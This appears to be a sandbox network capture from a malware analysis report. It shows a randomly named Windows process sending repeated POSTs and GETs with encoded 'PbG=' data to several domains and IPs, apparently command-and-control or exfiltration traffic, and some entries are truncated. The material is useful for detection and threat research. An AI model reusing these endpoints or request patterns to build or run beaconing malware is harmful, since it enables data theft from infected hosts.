                                                                                                                                                    Oct 4, 2024 11:58:32.495301008 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49738 | 184.73.212.51 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:35.026010036 CEST | 719 | OUT | POST /b2tl/ HTTP/1.1
Host: www.philippatston.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.philippatston.com
Referer: http://www.philippatston.com/b2tl/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 4c 4a 41 52 59 66 71 70 68 42 77 46 33 55 66 4e 46 6e 69 71 56 41 45 4d 73 4f 4f 65 4f 53 79 76 4d 56 31 47 69 70 49 33 53 33 7a 36 43 56 4a 6f 34 5a 36 6f 46 48 38 38 70 71 63 4f 51 78 37 66 53 78 64 49 30 41 6a 72 48 5a 43 6d 75 6d 68 58 58 43 6b 65 68 36 63 65 44 50 58 2b 73 4c 74 37 56 46 6d 72 6d 76 4d 78 46 38 54 49 2f 52 67 46 4e 4c 2f 38 76 30 4b 6a 4a 70 6c 4f 72 43 43 7a 70 49 59 39 77 41 47 30 70 53 52 73 4b 37 4a 2b 4b 51 54 6e 76 51 75 64 30 52 47 74 64 59 49 56 7a 37 2f 7a 33 66 63 4b 56 4f 42 51 70 6e 50 57 4c 45 79 7a 62 4c 4b 50 71 6c 4e 6c 72 78 4b 4d 4f 78 57 32 44 55 4e 36 35 49 3d
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNLJARYfqphBwF3UfNFniqVAEMsOOeOSyvMV1GipI3S3z6CVJo4Z6oFH88pqcOQx7fSxdI0AjrHZCmumhXXCkeh6ceDPX+sLt7VFmrmvMxF8TI/RgFNL/8v0KjJplOrCCzpIY9wAG0pSRsK7J+KQTnvQud0RGtdYIVz7/z3fcKVOBQpnPWLEyzbLKPqlNlrxKMOxW2DUN65I=
Oct 4, 2024 11:58:35.129125118 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:58:35 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49739 | 184.73.212.51 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:37.650074005 CEST | 6924 | OUT | POST /b2tl/ HTTP/1.1
Host: www.philippatston.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 6424
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.philippatston.com
Referer: http://www.philippatston.com/b2tl/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 4c 4a 41 52 59 66 71 70 68 42 77 46 33 55 66 4e 46 6e 69 71 56 41 45 4d 73 4f 4f 65 49 4b 79 76 2b 64 31 48 42 42 49 32 53 33 7a 77 69 56 45 6f 34 5a 64 6f 47 33 34 38 70 6e 70 4f 53 35 37 64 78 35 64 5a 6c 41 6a 68 48 5a 43 35 2b 6d 6b 59 33 43 39 65 68 72 58 65 44 66 58 2b 73 4c 74 37 54 68 6d 73 33 76 4d 7a 46 38 63 50 2f 51 79 54 39 4c 62 38 76 74 78 6a 4a 74 66 62 4b 69 43 77 4a 59 59 2f 69 59 47 72 5a 53 54 67 71 36 57 2b 4b 64 4e 6e 76 4d 49 64 33 4d 70 74 65 34 49 46 56 79 59 67 55 6e 61 4a 43 33 57 55 71 66 6e 56 70 56 67 39 5a 58 56 65 34 59 6d 68 75 39 46 51 64 78 2b 79 79 45 4f 68 4e 36 34 47 73 38 43 39 58 45 5a 7a 56 63 38 66 6d 38 36 34 6f 65 37 43 69 69 46 6f 4d 53 4e 58 76 70 55 68 79 64 67 35 76 77 42 53 38 6e 4f 48 56 4c 55 39 72 2f 45 79 49 55 4b 49 37 4a 77 6c 74 5a 49 6a 30 48 4f 66 4d 52 58 58 64 79 56 77 73 2f 67 55 53 6b 54 4b 31 54 76 74 4b 2f 36 53 4e 76 4d 76 52 4c 70 66 55 76 57 4e 6e 6d 30 6b 75 4f 6d 4f 35 4c 58 38 50 [TRUNCATED]
Oct 4, 2024 11:58:37.752475023 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:58:37 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 11:58:37.753426075 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49740 | 184.73.212.51 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:40.277545929 CEST | 431 | OUT | GET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.philippatston.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 11:58:40.381834984 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 09:58:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49741 | 199.192.19.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:45.760219097 CEST | 684 | OUT | POST /44em/ HTTP/1.1
Host: www.stayvact.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.stayvact.xyz
Referer: http://www.stayvact.xyz/44em/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm2Ahszs6QNEBwXCWx2kmwJg70uCDS/yQZmPy74zhRRryP5jzOmMJK/ODbiim7Qr/jSNkDnhQ0qnfvzDV3PiGg9wRcXAi84QKNEEeSfk/V95LKq8nzQPR7nWf6FaD8rS8jnIn3gx5PTzWtgEJY/Bp7T+6uEepwV4gH/8cwPShsrGjfgFpuSx/aBQ==
Oct 4, 2024 11:58:45.962210894 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Fri, 04 Oct 2024 09:58:45 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16026
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


Session ID: 10
Source IP: 192.168.11.20
Source Port: 49742
Destination IP: 199.192.19.19
Destination Port: 80
PID: 1136
Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp: Oct 4, 2024 11:58:48.466025114 CEST
Bytes transferred: 704
Direction: OUT
Data:
POST /44em/ HTTP/1.1
Host: www.stayvact.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.stayvact.xyz
Referer: http://www.stayvact.xyz/44em/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm0hRsxKyQaUBzdiWx4Em0Jg30uDXC+AkZmvC752NRcLyPtTyKpsJN/P/Timm7QrrjSPMDnyI34Hft6jV1LiGg9wRcXDeC4QSNF0OSO1/WwZLJ6snzHfR/nWfMFazWrREjnI33nkUZZzXmvkInyAYwdKzdL8hARqEG3KNqSgVIoV/tk1QGQz+Bcbx80QxRTriUU5MecFNLTG8=
Timestamp: Oct 4, 2024 11:58:48.664613962 CEST
Bytes transferred: 1289
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Fri, 04 Oct 2024 09:58:48 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16026
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html


Session ID: 11
Source IP: 192.168.11.20
Source Port: 49743
Destination IP: 199.192.19.19
Destination Port: 80
PID: 1136
Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp: Oct 4, 2024 11:58:51.187577009 CEST
Bytes transferred: 6909
Direction: OUT
Data:
POST /44em/ HTTP/1.1
Host: www.stayvact.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 6424
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.stayvact.xyz
Referer: http://www.stayvact.xyz/44em/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Timestamp: Oct 4, 2024 11:58:51.398381948 CEST
Bytes transferred: 1289
Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Fri, 04 Oct 2024 09:58:51 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16026
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html


Session ID: 12
Source IP: 192.168.11.20
Source Port: 49744
Destination IP: 199.192.19.19
Destination Port: 80
PID: 1136
Process: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp: Oct 4, 2024 11:58:53.902379036 CEST
Bytes transferred: 426
Direction: OUT
Data:
GET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.stayvact.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:58:54.103954077 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:54 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49745 | 13.248.169.48 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:58:59.637206078 CEST | 702 | OUT | POST /9ned/ HTTP/1.1
Host: www.sleephygienist.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.sleephygienist.org
Referer: http://www.sleephygienist.org/9ned/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/Odzp0yGByg15Y+lLgqhb4cFCgG5TKQ+aE3xJJBiCO7Uqy6JJshbMIvpwe/iuYf5YL6YxAEpTozwLyR1ZYTrykb8ZqFhK97tMFbQyRx+NIsEp+wQ3TkqsZk2/zJ3yNLTC9J8x7TUna3qVgq8BDva+h21/UMIarwxr1W4LRtHioHk5xQ6dQvf4e6Zg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49746 | 13.248.169.48 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:02.270221949 CEST | 722 | OUT | POST /9ned/ HTTP/1.1
Host: www.sleephygienist.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.sleephygienist.org
Referer: http://www.sleephygienist.org/9ned/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/OdyJEyEmOg95Y/57gqr750FCsG5X7d5ow3/M1BjDO7Xqy6Cps9DsIwpwCBiu0f5cj6YxQEplg0wbyXupYNlSkb8ZqFhLNdtMdbQChx8sIvFp+3AXTk58Zg2/zr32MQTA1J8wLTUzG0zlgsxhDhV+kc5dU/br7xwLkow9A3aQcjnqti+tpHd6fhEh7rjRuY2LGTf9s4eM03mU4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49747 | 13.248.169.48 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:04.895952940 CEST | 1289 | OUT | POST /9ned/ HTTP/1.1
Host: www.sleephygienist.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 6424
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.sleephygienist.org
Referer: http://www.sleephygienist.org/9ned/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49748 | 13.248.169.48 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:07.520243883 CEST | 432 | OUT | GET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.sleephygienist.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 11:59:07.622317076 CEST | 397 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 04 Oct 2024 09:59:07 GMT
Content-Type: text/html
Content-Length: 257
Connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49749 | 43.252.167.188 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:13.851603985 CEST | 708 | OUT | POST /y6iz/ HTTP/1.1
Host: www.xn--fhq1c541j0zr.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: close
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.xn--fhq1c541j0zr.com
Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R7X9WfEM0P/dYF4oEaFcS9mqxW7UEOiIhLBHV/YlqfesyvRF20U1Ji5vT5JTldoSBSyJQWwccwW1Cm+XL3EpD/FESu95LWbnSOe8mQopkl/lMZt7/bb+8wlpEAeVCLM6MqKI1gKpNaT2O48BQVknlrCLkVsXOlEBkHNYdBUxIduUXwhUu7+HKUg==
Oct 4, 2024 11:59:14.156435013 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:08:58 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49750 | 43.252.167.188 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:16.702156067 CEST | 728 | OUT | POST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R53NWdnU0YPdbbooEQlce9hixW55cNRshLh3VtJlqR+sy3BFzpk1Ci5jx5NXldsCBSwRQWj0fiW1AyOXFzEpD/FESu9tyWbPSPuMmRNdn5PlPet7/Q7+gwlpyAbxoLJmMqIA1u+dMPj2M88AXVn2TlS3gasHFlURtL7JHcmFse9Il0RtG58GRJp8QnlxrXj64GmCMKas3kLA=
Oct 4, 2024 11:59:17.018568993 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:09:01 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49751 | 43.252.167.188 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:19.532650948 CEST | 2578 | OUT | POST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG=[TRUNCATED]
Oct 4, 2024 11:59:19.532670021 CEST | 4355 | OUT |
                                                                                                                                                    Data Ascii: iDLYf7yXc3rWdki++gY0PfF2IXtIvW2+GppN3sh5+c9viaAwzTEdNm+vS61IKl/YdskAIg3AOHtGYQABwGl7jkqZxzmyDmDfQalsCFpzLbIQVZGnDFiZ0rvbi7GIERGmum74Y05PCuNrbsKGtmAxKyjkVBW/TtisfC4erzPTtEltaVzRE391HfuJXXr+jGNhQYxHbCfkpFwXyWET6/loJeheMcpkS8hixAqQQnjff3PqiOJ6Iaz
Oct 4, 2024 11:59:19.836638927 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:09:03 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 49752 | 43.252.167.188 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 11:59:22.376099110 CEST | 434 | OUT | GET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 11:59:22.696135044 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:09:06 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
